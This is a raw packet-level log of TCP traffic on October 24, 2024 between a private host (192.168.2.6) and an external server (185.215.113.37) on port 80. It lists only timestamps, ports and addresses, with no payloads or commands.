Oct 24, 2024 13:02:19.480392933 CEST	49711	80	192.168.2.6	185.215.113.37
Oct 24, 2024 13:02:19.480392933 CEST	80	49711	185.215.113.37	192.168.2.6
Oct 24, 2024 13:02:19.480426073 CEST	80	49711	185.215.113.37	192.168.2.6
Oct 24, 2024 13:02:19.480433941 CEST	49711	80	192.168.2.6	185.215.113.37
Oct 24, 2024 13:02:19.480462074 CEST	80	49711	185.215.113.37	192.168.2.6
Oct 24, 2024 13:02:19.480468988 CEST	49711	80	192.168.2.6	185.215.113.37
Oct 24, 2024 13:02:19.480495930 CEST	80	49711	185.215.113.37	192.168.2.6
Oct 24, 2024 13:02:19.480504036 CEST	49711	80	192.168.2.6	185.215.113.37
Oct 24, 2024 13:02:19.480530977 CEST	80	49711	185.215.113.37	192.168.2.6
Oct 24, 2024 13:02:19.480540037 CEST	49711	80	192.168.2.6	185.215.113.37
Oct 24, 2024 13:02:19.480565071 CEST	80	49711	185.215.113.37	192.168.2.6
Oct 24, 2024 13:02:19.480575085 CEST	49711	80	192.168.2.6	185.215.113.37
Oct 24, 2024 13:02:19.480600119 CEST	80	49711	185.215.113.37	192.168.2.6
Oct 24, 2024 13:02:19.480612040 CEST	49711	80	192.168.2.6	185.215.113.37
Oct 24, 2024 13:02:19.480634928 CEST	80	49711	185.215.113.37	192.168.2.6
Oct 24, 2024 13:02:19.480645895 CEST	49711	80	192.168.2.6	185.215.113.37
Oct 24, 2024 13:02:19.480674982 CEST	49711	80	192.168.2.6	185.215.113.37
Oct 24, 2024 13:02:19.480840921 CEST	80	49711	185.215.113.37	192.168.2.6
Oct 24, 2024 13:02:19.480875015 CEST	80	49711	185.215.113.37	192.168.2.6
Oct 24, 2024 13:02:19.480887890 CEST	49711	80	192.168.2.6	185.215.113.37
Oct 24, 2024 13:02:19.480909109 CEST	80	49711	185.215.113.37	192.168.2.6
Oct 24, 2024 13:02:19.480915070 CEST	49711	80	192.168.2.6	185.215.113.37
Oct 24, 2024 13:02:19.480941057 CEST	80	49711	185.215.113.37	192.168.2.6
Oct 24, 2024 13:02:19.480950117 CEST	49711	80	192.168.2.6	185.215.113.37
Oct 24, 2024 13:02:19.480974913 CEST	80	49711	185.215.113.37	192.168.2.6
Oct 24, 2024 13:02:19.480979919 CEST	49711	80	192.168.2.6	185.215.113.37
Oct 24, 2024 13:02:19.481009007 CEST	80	49711	185.215.113.37	192.168.2.6
Oct 24, 2024 13:02:19.481017113 CEST	49711	80	192.168.2.6	185.215.113.37
Oct 24, 2024 13:02:19.481044054 CEST	80	49711	185.215.113.37	192.168.2.6
Oct 24, 2024 13:02:19.481049061 CEST	49711	80	192.168.2.6	185.215.113.37
Oct 24, 2024 13:02:19.481077909 CEST	80	49711	185.215.113.37	192.168.2.6
Oct 24, 2024 13:02:19.481086969 CEST	49711	80	192.168.2.6	185.215.113.37
Oct 24, 2024 13:02:19.481112957 CEST	80	49711	185.215.113.37	192.168.2.6
Oct 24, 2024 13:02:19.481117964 CEST	49711	80	192.168.2.6	185.215.113.37
Oct 24, 2024 13:02:19.481147051 CEST	80	49711	185.215.113.37	192.168.2.6
Oct 24, 2024 13:02:19.481154919 CEST	49711	80	192.168.2.6	185.215.113.37
Oct 24, 2024 13:02:19.481182098 CEST	80	49711	185.215.113.37	192.168.2.6
Oct 24, 2024 13:02:19.481187105 CEST	49711	80	192.168.2.6	185.215.113.37
Oct 24, 2024 13:02:19.481215954 CEST	80	49711	185.215.113.37	192.168.2.6
Oct 24, 2024 13:02:19.481220961 CEST	49711	80	192.168.2.6	185.215.113.37
Oct 24, 2024 13:02:19.481254101 CEST	80	49711	185.215.113.37	192.168.2.6
Oct 24, 2024 13:02:19.481256962 CEST	49711	80	192.168.2.6	185.215.113.37
Oct 24, 2024 13:02:19.481293917 CEST	49711	80	192.168.2.6	185.215.113.37
Oct 24, 2024 13:02:19.481405973 CEST	80	49711	185.215.113.37	192.168.2.6
Oct 24, 2024 13:02:19.481439114 CEST	80	49711	185.215.113.37	192.168.2.6
Oct 24, 2024 13:02:19.481447935 CEST	49711	80	192.168.2.6	185.215.113.37
Oct 24, 2024 13:02:19.481472969 CEST	80	49711	185.215.113.37	192.168.2.6
Oct 24, 2024 13:02:19.481477976 CEST	49711	80	192.168.2.6	185.215.113.37
Oct 24, 2024 13:02:19.481508017 CEST	80	49711	185.215.113.37	192.168.2.6
Oct 24, 2024 13:02:19.481514931 CEST	49711	80	192.168.2.6	185.215.113.37
Oct 24, 2024 13:02:19.481542110 CEST	80	49711	185.215.113.37	192.168.2.6
Oct 24, 2024 13:02:19.481549025 CEST	49711	80	192.168.2.6	185.215.113.37
Oct 24, 2024 13:02:19.481574059 CEST	80	49711	185.215.113.37	192.168.2.6
Oct 24, 2024 13:02:19.481584072 CEST	49711	80	192.168.2.6	185.215.113.37
Oct 24, 2024 13:02:19.481609106 CEST	80	49711	185.215.113.37	192.168.2.6
Oct 24, 2024 13:02:19.481615067 CEST	49711	80	192.168.2.6	185.215.113.37
Oct 24, 2024 13:02:19.481642962 CEST	80	49711	185.215.113.37	192.168.2.6
Oct 24, 2024 13:02:19.481647968 CEST	49711	80	192.168.2.6	185.215.113.37
Oct 24, 2024 13:02:19.481677055 CEST	80	49711	185.215.113.37	192.168.2.6
Oct 24, 2024 13:02:19.481681108 CEST	49711	80	192.168.2.6	185.215.113.37
Oct 24, 2024 13:02:19.481713057 CEST	80	49711	185.215.113.37	192.168.2.6
Oct 24, 2024 13:02:19.481726885 CEST	49711	80	192.168.2.6	185.215.113.37
Oct 24, 2024 13:02:19.481749058 CEST	80	49711	185.215.113.37	192.168.2.6
Oct 24, 2024 13:02:19.481754065 CEST	49711	80	192.168.2.6	185.215.113.37
Oct 24, 2024 13:02:19.481782913 CEST	80	49711	185.215.113.37	192.168.2.6
Oct 24, 2024 13:02:19.481787920 CEST	49711	80	192.168.2.6	185.215.113.37
Oct 24, 2024 13:02:19.481817007 CEST	80	49711	185.215.113.37	192.168.2.6
Oct 24, 2024 13:02:19.481818914 CEST	49711	80	192.168.2.6	185.215.113.37
Oct 24, 2024 13:02:19.481851101 CEST	80	49711	185.215.113.37	192.168.2.6
Oct 24, 2024 13:02:19.481859922 CEST	49711	80	192.168.2.6	185.215.113.37
Oct 24, 2024 13:02:19.481884956 CEST	80	49711	185.215.113.37	192.168.2.6
Oct 24, 2024 13:02:19.481889963 CEST	49711	80	192.168.2.6	185.215.113.37
Oct 24, 2024 13:02:19.481919050 CEST	80	49711	185.215.113.37	192.168.2.6
Oct 24, 2024 13:02:19.481924057 CEST	49711	80	192.168.2.6	185.215.113.37
Oct 24, 2024 13:02:19.481955051 CEST	80	49711	185.215.113.37	192.168.2.6
Oct 24, 2024 13:02:19.481961012 CEST	49711	80	192.168.2.6	185.215.113.37
Oct 24, 2024 13:02:19.481991053 CEST	80	49711	185.215.113.37	192.168.2.6
Oct 24, 2024 13:02:19.482017040 CEST	49711	80	192.168.2.6	185.215.113.37
Oct 24, 2024 13:02:19.482026100 CEST	80	49711	185.215.113.37	192.168.2.6
Oct 24, 2024 13:02:19.482031107 CEST	49711	80	192.168.2.6	185.215.113.37
Oct 24, 2024 13:02:19.482064962 CEST	49711	80	192.168.2.6	185.215.113.37
Oct 24, 2024 13:02:19.482359886 CEST	80	49711	185.215.113.37	192.168.2.6
Oct 24, 2024 13:02:19.482393980 CEST	80	49711	185.215.113.37	192.168.2.6
Oct 24, 2024 13:02:19.482412100 CEST	49711	80	192.168.2.6	185.215.113.37
Oct 24, 2024 13:02:19.482428074 CEST	80	49711	185.215.113.37	192.168.2.6
Oct 24, 2024 13:02:19.482460976 CEST	49711	80	192.168.2.6	185.215.113.37
Oct 24, 2024 13:02:19.482461929 CEST	80	49711	185.215.113.37	192.168.2.6
Oct 24, 2024 13:02:19.482474089 CEST	49711	80	192.168.2.6	185.215.113.37
Oct 24, 2024 13:02:19.482496977 CEST	80	49711	185.215.113.37	192.168.2.6
Oct 24, 2024 13:02:19.482507944 CEST	49711	80	192.168.2.6	185.215.113.37
Oct 24, 2024 13:02:19.482531071 CEST	80	49711	185.215.113.37	192.168.2.6
Oct 24, 2024 13:02:19.482563972 CEST	80	49711	185.215.113.37	192.168.2.6
Oct 24, 2024 13:02:19.482574940 CEST	49711	80	192.168.2.6	185.215.113.37
Oct 24, 2024 13:02:19.482598066 CEST	80	49711	185.215.113.37	192.168.2.6
Oct 24, 2024 13:02:19.482604980 CEST	49711	80	192.168.2.6	185.215.113.37
Oct 24, 2024 13:02:19.482633114 CEST	80	49711	185.215.113.37	192.168.2.6
Oct 24, 2024 13:02:19.482664108 CEST	49711	80	192.168.2.6	185.215.113.37
Oct 24, 2024 13:02:19.482665062 CEST	80	49711	185.215.113.37	192.168.2.6
Oct 24, 2024 13:02:19.482678890 CEST	49711	80	192.168.2.6	185.215.113.37
Oct 24, 2024 13:02:19.482700109 CEST	80	49711	185.215.113.37	192.168.2.6
Oct 24, 2024 13:02:19.482712984 CEST	49711	80	192.168.2.6	185.215.113.37
Oct 24, 2024 13:02:19.482733011 CEST	80	49711	185.215.113.37	192.168.2.6
Oct 24, 2024 13:02:19.482742071 CEST	49711	80	192.168.2.6	185.215.113.37
Oct 24, 2024 13:02:19.482767105 CEST	80	49711	185.215.113.37	192.168.2.6
Oct 24, 2024 13:02:19.482800007 CEST	80	49711	185.215.113.37	192.168.2.6
Oct 24, 2024 13:02:19.482808113 CEST	49711	80	192.168.2.6	185.215.113.37
Oct 24, 2024 13:02:19.482834101 CEST	80	49711	185.215.113.37	192.168.2.6
Oct 24, 2024 13:02:19.482841015 CEST	49711	80	192.168.2.6	185.215.113.37
Oct 24, 2024 13:02:19.482867956 CEST	80	49711	185.215.113.37	192.168.2.6
Oct 24, 2024 13:02:19.482875109 CEST	49711	80	192.168.2.6	185.215.113.37
Oct 24, 2024 13:02:19.482903004 CEST	80	49711	185.215.113.37	192.168.2.6
Oct 24, 2024 13:02:19.482911110 CEST	49711	80	192.168.2.6	185.215.113.37
Oct 24, 2024 13:02:19.482938051 CEST	80	49711	185.215.113.37	192.168.2.6
Oct 24, 2024 13:02:19.482947111 CEST	49711	80	192.168.2.6	185.215.113.37
Oct 24, 2024 13:02:19.482971907 CEST	80	49711	185.215.113.37	192.168.2.6
Oct 24, 2024 13:02:19.482981920 CEST	49711	80	192.168.2.6	185.215.113.37
Oct 24, 2024 13:02:19.483007908 CEST	80	49711	185.215.113.37	192.168.2.6
Oct 24, 2024 13:02:19.483048916 CEST	49711	80	192.168.2.6	185.215.113.37
Oct 24, 2024 13:02:19.483294964 CEST	80	49711	185.215.113.37	192.168.2.6
Oct 24, 2024 13:02:19.483338118 CEST	49711	80	192.168.2.6	185.215.113.37
Oct 24, 2024 13:02:19.483351946 CEST	80	49711	185.215.113.37	192.168.2.6
Oct 24, 2024 13:02:19.483385086 CEST	80	49711	185.215.113.37	192.168.2.6
Oct 24, 2024 13:02:19.483395100 CEST	49711	80	192.168.2.6	185.215.113.37
Oct 24, 2024 13:02:19.483418941 CEST	80	49711	185.215.113.37	192.168.2.6
Oct 24, 2024 13:02:19.483429909 CEST	49711	80	192.168.2.6	185.215.113.37
Oct 24, 2024 13:02:19.483453035 CEST	80	49711	185.215.113.37	192.168.2.6
Oct 24, 2024 13:02:19.483463049 CEST	49711	80	192.168.2.6	185.215.113.37
Oct 24, 2024 13:02:19.483488083 CEST	80	49711	185.215.113.37	192.168.2.6
Oct 24, 2024 13:02:19.483494997 CEST	49711	80	192.168.2.6	185.215.113.37
Oct 24, 2024 13:02:19.483520985 CEST	80	49711	185.215.113.37	192.168.2.6
Oct 24, 2024 13:02:19.483529091 CEST	49711	80	192.168.2.6	185.215.113.37
Oct 24, 2024 13:02:19.483555079 CEST	80	49711	185.215.113.37	192.168.2.6
Oct 24, 2024 13:02:19.483566046 CEST	49711	80	192.168.2.6	185.215.113.37
Oct 24, 2024 13:02:19.483588934 CEST	80	49711	185.215.113.37	192.168.2.6
Oct 24, 2024 13:02:19.483598948 CEST	49711	80	192.168.2.6	185.215.113.37
Oct 24, 2024 13:02:19.483623028 CEST	80	49711	185.215.113.37	192.168.2.6
Oct 24, 2024 13:02:19.483633995 CEST	49711	80	192.168.2.6	185.215.113.37
Oct 24, 2024 13:02:19.483656883 CEST	80	49711	185.215.113.37	192.168.2.6
Oct 24, 2024 13:02:19.483665943 CEST	49711	80	192.168.2.6	185.215.113.37
Oct 24, 2024 13:02:19.483691931 CEST	80	49711	185.215.113.37	192.168.2.6
Oct 24, 2024 13:02:19.483696938 CEST	49711	80	192.168.2.6	185.215.113.37
Oct 24, 2024 13:02:19.483726025 CEST	80	49711	185.215.113.37	192.168.2.6
Oct 24, 2024 13:02:19.483735085 CEST	49711	80	192.168.2.6	185.215.113.37
Oct 24, 2024 13:02:19.483760118 CEST	80	49711	185.215.113.37	192.168.2.6
Oct 24, 2024 13:02:19.483767986 CEST	49711	80	192.168.2.6	185.215.113.37
Oct 24, 2024 13:02:19.483792067 CEST	80	49711	185.215.113.37	192.168.2.6
Oct 24, 2024 13:02:19.483803034 CEST	49711	80	192.168.2.6	185.215.113.37
Oct 24, 2024 13:02:19.483825922 CEST	80	49711	185.215.113.37	192.168.2.6
Oct 24, 2024 13:02:19.483831882 CEST	49711	80	192.168.2.6	185.215.113.37
Oct 24, 2024 13:02:19.483865976 CEST	80	49711	185.215.113.37	192.168.2.6
Oct 24, 2024 13:02:19.483867884 CEST	49711	80	192.168.2.6	185.215.113.37
Oct 24, 2024 13:02:19.483901024 CEST	80	49711	185.215.113.37	192.168.2.6
Oct 24, 2024 13:02:19.483910084 CEST	49711	80	192.168.2.6	185.215.113.37
Oct 24, 2024 13:02:19.483938932 CEST	49711	80	192.168.2.6	185.215.113.37
Oct 24, 2024 13:02:19.522481918 CEST	80	49711	185.215.113.37	192.168.2.6
Oct 24, 2024 13:02:19.522543907 CEST	80	49711	185.215.113.37	192.168.2.6
Oct 24, 2024 13:02:19.522578955 CEST	80	49711	185.215.113.37	192.168.2.6
Oct 24, 2024 13:02:19.522592068 CEST	49711	80	192.168.2.6	185.215.113.37
Oct 24, 2024 13:02:19.522793055 CEST	49711	80	192.168.2.6	185.215.113.37
Oct 24, 2024 13:02:19.562041044 CEST	80	49711	185.215.113.37	192.168.2.6
Oct 24, 2024 13:02:19.562058926 CEST	80	49711	185.215.113.37	192.168.2.6
Oct 24, 2024 13:02:19.562073946 CEST	80	49711	185.215.113.37	192.168.2.6
Oct 24, 2024 13:02:19.562131882 CEST	80	49711	185.215.113.37	192.168.2.6
Oct 24, 2024 13:02:19.562144041 CEST	80	49711	185.215.113.37	192.168.2.6
Oct 24, 2024 13:02:19.562160015 CEST	49711	80	192.168.2.6	185.215.113.37
Oct 24, 2024 13:02:19.562160015 CEST	49711	80	192.168.2.6	185.215.113.37
Oct 24, 2024 13:02:19.562200069 CEST	49711	80	192.168.2.6	185.215.113.37
Oct 24, 2024 13:02:19.562200069 CEST	49711	80	192.168.2.6	185.215.113.37
Oct 24, 2024 13:02:19.562504053 CEST	80	49711	185.215.113.37	192.168.2.6
Oct 24, 2024 13:02:19.562623024 CEST	80	49711	185.215.113.37	192.168.2.6
Oct 24, 2024 13:02:19.562654018 CEST	80	49711	185.215.113.37	192.168.2.6
Oct 24, 2024 13:02:19.562681913 CEST	49711	80	192.168.2.6	185.215.113.37
Oct 24, 2024 13:02:19.562686920 CEST	80	49711	185.215.113.37	192.168.2.6
Oct 24, 2024 13:02:19.562717915 CEST	49711	80	192.168.2.6	185.215.113.37
Oct 24, 2024 13:02:19.562949896 CEST	49711	80	192.168.2.6	185.215.113.37
Oct 24, 2024 13:02:19.595144987 CEST	80	49711	185.215.113.37	192.168.2.6
Oct 24, 2024 13:02:19.595199108 CEST	80	49711	185.215.113.37	192.168.2.6
Oct 24, 2024 13:02:19.595232010 CEST	49711	80	192.168.2.6	185.215.113.37
Oct 24, 2024 13:02:19.595236063 CEST	80	49711	185.215.113.37	192.168.2.6
Oct 24, 2024 13:02:19.595268011 CEST	49711	80	192.168.2.6	185.215.113.37
Oct 24, 2024 13:02:19.595271111 CEST	80	49711	185.215.113.37	192.168.2.6
Oct 24, 2024 13:02:19.595308065 CEST	80	49711	185.215.113.37	192.168.2.6
Oct 24, 2024 13:02:19.595339060 CEST	49711	80	192.168.2.6	185.215.113.37
Oct 24, 2024 13:02:19.595375061 CEST	80	49711	185.215.113.37	192.168.2.6
Oct 24, 2024 13:02:19.595398903 CEST	49711	80	192.168.2.6	185.215.113.37
Oct 24, 2024 13:02:19.595408916 CEST	80	49711	185.215.113.37	192.168.2.6
Oct 24, 2024 13:02:19.595438004 CEST	49711	80	192.168.2.6	185.215.113.37
Oct 24, 2024 13:02:19.595443964 CEST	80	49711	185.215.113.37	192.168.2.6
Oct 24, 2024 13:02:19.595474958 CEST	49711	80	192.168.2.6	185.215.113.37
Oct 24, 2024 13:02:19.595479965 CEST	80	49711	185.215.113.37	192.168.2.6
Oct 24, 2024 13:02:19.595510006 CEST	49711	80	192.168.2.6	185.215.113.37
Oct 24, 2024 13:02:19.595516920 CEST	80	49711	185.215.113.37	192.168.2.6
Oct 24, 2024 13:02:19.595568895 CEST	80	49711	185.215.113.37	192.168.2.6
Oct 24, 2024 13:02:19.595602036 CEST	80	49711	185.215.113.37	192.168.2.6
Oct 24, 2024 13:02:19.595617056 CEST	49711	80	192.168.2.6	185.215.113.37
Oct 24, 2024 13:02:19.595635891 CEST	80	49711	185.215.113.37	192.168.2.6
Oct 24, 2024 13:02:19.595671892 CEST	80	49711	185.215.113.37	192.168.2.6
Oct 24, 2024 13:02:19.595695019 CEST	49711	80	192.168.2.6	185.215.113.37
Oct 24, 2024 13:02:19.595709085 CEST	80	49711	185.215.113.37	192.168.2.6
Oct 24, 2024 13:02:19.595736027 CEST	49711	80	192.168.2.6	185.215.113.37
Oct 24, 2024 13:02:19.595864058 CEST	80	49711	185.215.113.37	192.168.2.6
Oct 24, 2024 13:02:19.595896959 CEST	80	49711	185.215.113.37	192.168.2.6
Oct 24, 2024 13:02:19.595927000 CEST	49711	80	192.168.2.6	185.215.113.37
Oct 24, 2024 13:02:19.595947981 CEST	80	49711	185.215.113.37	192.168.2.6
Oct 24, 2024 13:02:19.595977068 CEST	49711	80	192.168.2.6	185.215.113.37
Oct 24, 2024 13:02:19.595982075 CEST	80	49711	185.215.113.37	192.168.2.6
Oct 24, 2024 13:02:19.596015930 CEST	80	49711	185.215.113.37	192.168.2.6
Oct 24, 2024 13:02:19.596049070 CEST	80	49711	185.215.113.37	192.168.2.6
Oct 24, 2024 13:02:19.596077919 CEST	49711	80	192.168.2.6	185.215.113.37
Oct 24, 2024 13:02:19.596077919 CEST	49711	80	192.168.2.6	185.215.113.37
Oct 24, 2024 13:02:19.596085072 CEST	80	49711	185.215.113.37	192.168.2.6
Oct 24, 2024 13:02:19.596115112 CEST	49711	80	192.168.2.6	185.215.113.37
Oct 24, 2024 13:02:19.596118927 CEST	80	49711	185.215.113.37	192.168.2.6
Oct 24, 2024 13:02:19.596146107 CEST	49711	80	192.168.2.6	185.215.113.37
Oct 24, 2024 13:02:19.596170902 CEST	49711	80	192.168.2.6	185.215.113.37
Oct 24, 2024 13:02:19.596307039 CEST	80	49711	185.215.113.37	192.168.2.6
Oct 24, 2024 13:02:19.596339941 CEST	80	49711	185.215.113.37	192.168.2.6
Oct 24, 2024 13:02:19.596374035 CEST	80	49711	185.215.113.37	192.168.2.6
Oct 24, 2024 13:02:19.596402884 CEST	49711	80	192.168.2.6	185.215.113.37
Oct 24, 2024 13:02:19.596406937 CEST	80	49711	185.215.113.37	192.168.2.6
Oct 24, 2024 13:02:19.596441984 CEST	80	49711	185.215.113.37	192.168.2.6
Oct 24, 2024 13:02:19.596467018 CEST	49711	80	192.168.2.6	185.215.113.37
Oct 24, 2024 13:02:19.596474886 CEST	80	49711	185.215.113.37	192.168.2.6
Oct 24, 2024 13:02:19.596506119 CEST	49711	80	192.168.2.6	185.215.113.37
Oct 24, 2024 13:02:19.596513033 CEST	80	49711	185.215.113.37	192.168.2.6
Oct 24, 2024 13:02:19.596549034 CEST	80	49711	185.215.113.37	192.168.2.6
Oct 24, 2024 13:02:19.596576929 CEST	49711	80	192.168.2.6	185.215.113.37
Oct 24, 2024 13:02:19.596807957 CEST	80	49711	185.215.113.37	192.168.2.6
Oct 24, 2024 13:02:19.596838951 CEST	49711	80	192.168.2.6	185.215.113.37
Oct 24, 2024 13:02:19.596842051 CEST	80	49711	185.215.113.37	192.168.2.6
Oct 24, 2024 13:02:19.596869946 CEST	49711	80	192.168.2.6	185.215.113.37
Oct 24, 2024 13:02:19.596875906 CEST	80	49711	185.215.113.37	192.168.2.6
Oct 24, 2024 13:02:19.596910954 CEST	80	49711	185.215.113.37	192.168.2.6
Oct 24, 2024 13:02:19.596940994 CEST	49711	80	192.168.2.6	185.215.113.37
Oct 24, 2024 13:02:19.596944094 CEST	80	49711	185.215.113.37	192.168.2.6
Oct 24, 2024 13:02:19.596980095 CEST	80	49711	185.215.113.37	192.168.2.6
Oct 24, 2024 13:02:19.597009897 CEST	49711	80	192.168.2.6	185.215.113.37
Oct 24, 2024 13:02:19.597012997 CEST	80	49711	185.215.113.37	192.168.2.6
Oct 24, 2024 13:02:19.597048998 CEST	80	49711	185.215.113.37	192.168.2.6
Oct 24, 2024 13:02:19.597213984 CEST	80	49711	185.215.113.37	192.168.2.6
Oct 24, 2024 13:02:19.597219944 CEST	49711	80	192.168.2.6	185.215.113.37
Oct 24, 2024 13:02:19.597249031 CEST	80	49711	185.215.113.37	192.168.2.6
Oct 24, 2024 13:02:19.597278118 CEST	49711	80	192.168.2.6	185.215.113.37
Oct 24, 2024 13:02:19.597284079 CEST	80	49711	185.215.113.37	192.168.2.6
Oct 24, 2024 13:02:19.597311974 CEST	49711	80	192.168.2.6	185.215.113.37
Oct 24, 2024 13:02:19.597318888 CEST	80	49711	185.215.113.37	192.168.2.6
Oct 24, 2024 13:02:19.597348928 CEST	49711	80	192.168.2.6	185.215.113.37
Oct 24, 2024 13:02:19.597352982 CEST	80	49711	185.215.113.37	192.168.2.6
Oct 24, 2024 13:02:19.597377062 CEST	49711	80	192.168.2.6	185.215.113.37
Oct 24, 2024 13:02:19.597385883 CEST	80	49711	185.215.113.37	192.168.2.6
Oct 24, 2024 13:02:19.597414970 CEST	49711	80	192.168.2.6	185.215.113.37
Oct 24, 2024 13:02:19.597420931 CEST	80	49711	185.215.113.37	192.168.2.6
Oct 24, 2024 13:02:19.597456932 CEST	80	49711	185.215.113.37	192.168.2.6
Oct 24, 2024 13:02:19.597489119 CEST	49711	80	192.168.2.6	185.215.113.37
Oct 24, 2024 13:02:19.597543001 CEST	49711	80	192.168.2.6	185.215.113.37
Oct 24, 2024 13:02:19.597709894 CEST	80	49711	185.215.113.37	192.168.2.6
Oct 24, 2024 13:02:19.597745895 CEST	80	49711	185.215.113.37	192.168.2.6
Oct 24, 2024 13:02:19.597775936 CEST	49711	80	192.168.2.6	185.215.113.37
Oct 24, 2024 13:02:19.597781897 CEST	80	49711	185.215.113.37	192.168.2.6
Oct 24, 2024 13:02:19.597812891 CEST	49711	80	192.168.2.6	185.215.113.37
Oct 24, 2024 13:02:19.597815990 CEST	80	49711	185.215.113.37	192.168.2.6
Oct 24, 2024 13:02:19.597851038 CEST	80	49711	185.215.113.37	192.168.2.6
Oct 24, 2024 13:02:19.597873926 CEST	49711	80	192.168.2.6	185.215.113.37
Oct 24, 2024 13:02:19.597883940 CEST	80	49711	185.215.113.37	192.168.2.6
Oct 24, 2024 13:02:19.597912073 CEST	49711	80	192.168.2.6	185.215.113.37
Oct 24, 2024 13:02:19.597918987 CEST	80	49711	185.215.113.37	192.168.2.6
Oct 24, 2024 13:02:19.597951889 CEST	80	49711	185.215.113.37	192.168.2.6
Oct 24, 2024 13:02:19.597984076 CEST	49711	80	192.168.2.6	185.215.113.37
Oct 24, 2024 13:02:19.598066092 CEST	49711	80	192.168.2.6	185.215.113.37
Oct 24, 2024 13:02:19.598165035 CEST	80	49711	185.215.113.37	192.168.2.6
Oct 24, 2024 13:02:19.598197937 CEST	80	49711	185.215.113.37	192.168.2.6
Oct 24, 2024 13:02:19.598232031 CEST	80	49711	185.215.113.37	192.168.2.6
Oct 24, 2024 13:02:19.598258018 CEST	49711	80	192.168.2.6	185.215.113.37
Oct 24, 2024 13:02:19.598258018 CEST	49711	80	192.168.2.6	185.215.113.37
Oct 24, 2024 13:02:19.598267078 CEST	80	49711	185.215.113.37	192.168.2.6
Oct 24, 2024 13:02:19.598294973 CEST	49711	80	192.168.2.6	185.215.113.37
Oct 24, 2024 13:02:19.598301888 CEST	80	49711	185.215.113.37	192.168.2.6
Oct 24, 2024 13:02:19.598331928 CEST	49711	80	192.168.2.6	185.215.113.37
Oct 24, 2024 13:02:19.598335981 CEST	80	49711	185.215.113.37	192.168.2.6
Oct 24, 2024 13:02:19.598371029 CEST	80	49711	185.215.113.37	192.168.2.6
Oct 24, 2024 13:02:19.598398924 CEST	49711	80	192.168.2.6	185.215.113.37
Oct 24, 2024 13:02:19.598403931 CEST	80	49711	185.215.113.37	192.168.2.6
Oct 24, 2024 13:02:19.598432064 CEST	49711	80	192.168.2.6	185.215.113.37
Oct 24, 2024 13:02:19.598439932 CEST	80	49711	185.215.113.37	192.168.2.6
Oct 24, 2024 13:02:19.598727942 CEST	80	49711	185.215.113.37	192.168.2.6
Oct 24, 2024 13:02:19.598756075 CEST	49711	80	192.168.2.6	185.215.113.37
Oct 24, 2024 13:02:19.598759890 CEST	80	49711	185.215.113.37	192.168.2.6
Oct 24, 2024 13:02:19.598795891 CEST	80	49711	185.215.113.37	192.168.2.6
Oct 24, 2024 13:02:19.598824024 CEST	49711	80	192.168.2.6	185.215.113.37
Oct 24, 2024 13:02:19.598829985 CEST	80	49711	185.215.113.37	192.168.2.6
Oct 24, 2024 13:02:19.598867893 CEST	80	49711	185.215.113.37	192.168.2.6
Oct 24, 2024 13:02:19.598893881 CEST	49711	80	192.168.2.6	185.215.113.37
Oct 24, 2024 13:02:19.598896980 CEST	80	49711	185.215.113.37	192.168.2.6
Oct 24, 2024 13:02:19.598931074 CEST	80	49711	185.215.113.37	192.168.2.6
Oct 24, 2024 13:02:19.598958969 CEST	49711	80	192.168.2.6	185.215.113.37
Oct 24, 2024 13:02:19.598964930 CEST	80	49711	185.215.113.37	192.168.2.6
Oct 24, 2024 13:02:19.599005938 CEST	80	49711	185.215.113.37	192.168.2.6
Oct 24, 2024 13:02:19.599034071 CEST	49711	80	192.168.2.6	185.215.113.37
Oct 24, 2024 13:02:19.599039078 CEST	80	49711	185.215.113.37	192.168.2.6
Oct 24, 2024 13:02:19.599072933 CEST	80	49711	185.215.113.37	192.168.2.6
Oct 24, 2024 13:02:19.599106073 CEST	49711	80	192.168.2.6	185.215.113.37
Oct 24, 2024 13:02:19.599112988 CEST	80	49711	185.215.113.37	192.168.2.6
Oct 24, 2024 13:02:19.599147081 CEST	80	49711	185.215.113.37	192.168.2.6
Oct 24, 2024 13:02:19.599175930 CEST	49711	80	192.168.2.6	185.215.113.37
Oct 24, 2024 13:02:19.599180937 CEST	80	49711	185.215.113.37	192.168.2.6
Oct 24, 2024 13:02:19.599211931 CEST	80	49711	185.215.113.37	192.168.2.6
Oct 24, 2024 13:02:19.599241018 CEST	49711	80	192.168.2.6	185.215.113.37
Oct 24, 2024 13:02:19.599246979 CEST	80	49711	185.215.113.37	192.168.2.6
Oct 24, 2024 13:02:19.599281073 CEST	80	49711	185.215.113.37	192.168.2.6
Oct 24, 2024 13:02:19.599334002 CEST	49711	80	192.168.2.6	185.215.113.37
Oct 24, 2024 13:02:19.599334002 CEST	49711	80	192.168.2.6	185.215.113.37
Oct 24, 2024 13:02:19.599595070 CEST	80	49711	185.215.113.37	192.168.2.6
Oct 24, 2024 13:02:19.599630117 CEST	80	49711	185.215.113.37	192.168.2.6
Oct 24, 2024 13:02:19.599659920 CEST	49711	80	192.168.2.6	185.215.113.37
Oct 24, 2024 13:02:19.599663973 CEST	80	49711	185.215.113.37	192.168.2.6
Oct 24, 2024 13:02:19.599699974 CEST	80	49711	185.215.113.37	192.168.2.6
Oct 24, 2024 13:02:19.599730968 CEST	49711	80	192.168.2.6	185.215.113.37
Oct 24, 2024 13:02:19.599734068 CEST	80	49711	185.215.113.37	192.168.2.6
Oct 24, 2024 13:02:19.599767923 CEST	80	49711	185.215.113.37	192.168.2.6
Oct 24, 2024 13:02:19.599797010 CEST	49711	80	192.168.2.6	185.215.113.37
Oct 24, 2024 13:02:19.599802971 CEST	80	49711	185.215.113.37	192.168.2.6
Oct 24, 2024 13:02:19.599836111 CEST	80	49711	185.215.113.37	192.168.2.6
Oct 24, 2024 13:02:19.599865913 CEST	49711	80	192.168.2.6	185.215.113.37
Oct 24, 2024 13:02:19.599869967 CEST	80	49711	185.215.113.37	192.168.2.6
Oct 24, 2024 13:02:19.599904060 CEST	80	49711	185.215.113.37	192.168.2.6
Oct 24, 2024 13:02:19.599931955 CEST	49711	80	192.168.2.6	185.215.113.37
Oct 24, 2024 13:02:19.599936008 CEST	80	49711	185.215.113.37	192.168.2.6
Oct 24, 2024 13:02:19.599972010 CEST	80	49711	185.215.113.37	192.168.2.6
Oct 24, 2024 13:02:19.600002050 CEST	49711	80	192.168.2.6	185.215.113.37
Oct 24, 2024 13:02:19.600008011 CEST	80	49711	185.215.113.37	192.168.2.6
Oct 24, 2024 13:02:19.600045919 CEST	80	49711	185.215.113.37	192.168.2.6
Oct 24, 2024 13:02:19.600075006 CEST	49711	80	192.168.2.6	185.215.113.37
Oct 24, 2024 13:02:19.600368023 CEST	80	49711	185.215.113.37	192.168.2.6
